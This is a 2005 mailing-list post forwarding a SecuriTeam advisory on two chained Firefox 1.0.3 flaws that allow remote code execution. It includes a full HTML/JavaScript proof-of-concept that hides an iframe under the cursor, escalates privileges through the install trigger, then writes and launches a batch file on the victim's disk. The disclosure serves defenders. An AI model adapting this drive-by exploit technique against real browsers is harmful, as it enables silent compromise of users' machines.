[eside-ghost] Fw: [EXPL] Mozilla Firefox Arbitrary Code Execution
(Exploit)
txipi
txipi en sindominio.net
Mar Mayo 10 19:56:24 CEST 2005
Aupa!
El exploit...
Begin forwarded message:
Date: 10 May 2005 13:15:28 +0200
From: SecuriTeam <support en securiteam.com>
To: list en securiteam.com
Subject: [EXPL] Mozilla Firefox Arbitrary Code Execution (Exploit)
The following security advisory is sent to the securiteam mailing list,
and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Mozilla Firefox Arbitrary Code Execution (Exploit)
------------------------------------------------------------------------
SUMMARY
Mozilla Firefox (originally known as Phoenix and briefly as Mozilla
Firebird) is "a free, cross-platform, graphical web browser developed by
the Mozilla Foundation and hundreds of volunteers".
Two vulnerabilities have been discovered in Firefox, which can be
exploited by malicious people to run malicious code on vulnerable
systems
and compromise its integrity.
DETAILS
Vulnerable Systems:
* Mozilla Firefox version 1.0.3
This proof of concept involve exploiting two flaws:
1) Tricking Firefox into thinking a software installation is being
triggered by a whitelisted site, using history stored trusted URL.
2) Software installation trigger not sufficiently checking image URLs
containing JavaScript code.
Workaround:
Disable software installation (Web Features panel of the
Options/Preferences window in Firefox 1.0.3 or the Content panel in the
latest trunk builds).
Vendor Status:
The Mozilla Foundation patched (partially) this issue on the server side
by adding random letters and numbers to the install function, which will
prevent this exploit from working. We anticipate that the Mozilla
Foundation will release a Firefox 1.0.4 update shortly.
Exploit:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
< html>
< head>
< title>Firefox Full Remote Compromise</title>
</head>
< body>
Click anywhere inside this page to compromise your system!<br>
Don't worry. Only a harmless batch file will be run. View the source if
you dont believe me ;)<br>
Like I said in my Internet Explorer Auto-SP2 RC analysis, nothing is
perfect. Breaking something, or if you're the hacker, building
something,
only requires patience and a little bit of spare time.<br> <br>
Greetz to Mikx, Michael Evanchik, and the entire Mozilla team. This is a
very nice browser you guys have put together!
< iframe onload="loader()" src="javascript:'< noscript>'+eval('if
(window.name!=\'stealcookies\')
{ window.name=\'stealcookies\'; } else { event=
{ target:{ href:
\'http://ftp.mozilla.org/pub/mozilla.org/extensions/flashgot/flashgot-0
.5.9.1-fx+mz+tb.xpi\'} };
install(event, \'You are
vulnerable!!!\',\'javascript:eval(\\\'netscape.security.PrivilegeManage
r.
enablePrivilege(\\\\\\\'UniversalXPConnect\\\\\\\'); file =
Components.classes
[\\\\\\\'@mozilla.org/file/local;1\\\\\\\'].createInstance(Components.i
nterfaces.nsILocalFile);
file.initWithPath(\\\\\\\'c:\\\\\\\\\\\\\\\\booom.bat\\\\\\\');
file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);
outputStream =
Components.classes[\\\\\\\'@mozilla.org/network/file-output-stream;1\\\
\\\\'].
createInstance( Components.interfaces.nsIFileOutputStream );
outputStream.init(file,0x04|0x08|0x20,420,0); output=\\\\\\\'@ECHO
off\\\\\\\\ncls\\\\\\\\n
ECHO If I wasnt so nice, this could have been a virus...
\\\\\\\\nPAUSE\\\\\\\';
outputStream.write(output,output.length); outputStream.close();
file.launch();\\\')\'); }') + '</noscript>< a
href=\'https://addons.update.mozilla.org/extensions/moreinfo.php?id=220&
application=firefox\' style=\'cursor:default;\'> </'+'a>'"
id="targetframe" scrolling="no" frameborder="0" marginwidth="0"
marginheight=0"
style="position:absolute; left:0px; width:0px;height:6px; width:6px;
margin:0px;
padding:0px; -moz-opacity:0"></iframe>
< script language="JavaScript" type="text/javascript">
document.onmousemove = function trackMouse(e) {
document.getElementById("targetframe").style.left = (e.pageX-3)+"px"
document.getElementById("targetframe").style.top = (e.pageY-3)+"px"
}
var counter = 0;
function loader() {
counter++
if(counter == 1) {
stealcookies.focus()
} else if(counter == 2) {
stealcookies.history.go(-1)
//targetframe.style.display="none";
}
}
</script>
</body>
</html>
Bugzilla:
<https://bugzilla.mozilla.org/show_bug.cgi?id=292691>
https://bugzilla.mozilla.org/show_bug.cgi?id=292691 (limited access)
ADDITIONAL INFORMATION
The information has been provided by <mailto:tuytumadre en att.net>
tuytumadre en att.net.
The original article can be found at:
<http://greyhatsecurity.org/vulntests/ffrc.htm>
http://greyhatsecurity.org/vulntests/ffrc.htm
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and
body to: list-unsubscribe en securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe en securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of
any kind.
In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages.
--
Agur
txipi
wget -O - http://sindominio.net/~txipi/txipi.gpg.asc | gpg --import
Key fingerprint = CCAF 9676 B049 997A 96D6 4D7C 3529 5545 4375 1BF4
Another war ... must it always be so? How many comrades have we lost
in this way? ... Obedience. Duty. Death, and more death ...
-- Romulan Commander, "Balance of Terror", stardate 1709.2
Más información sobre la lista de distribución eside-ghost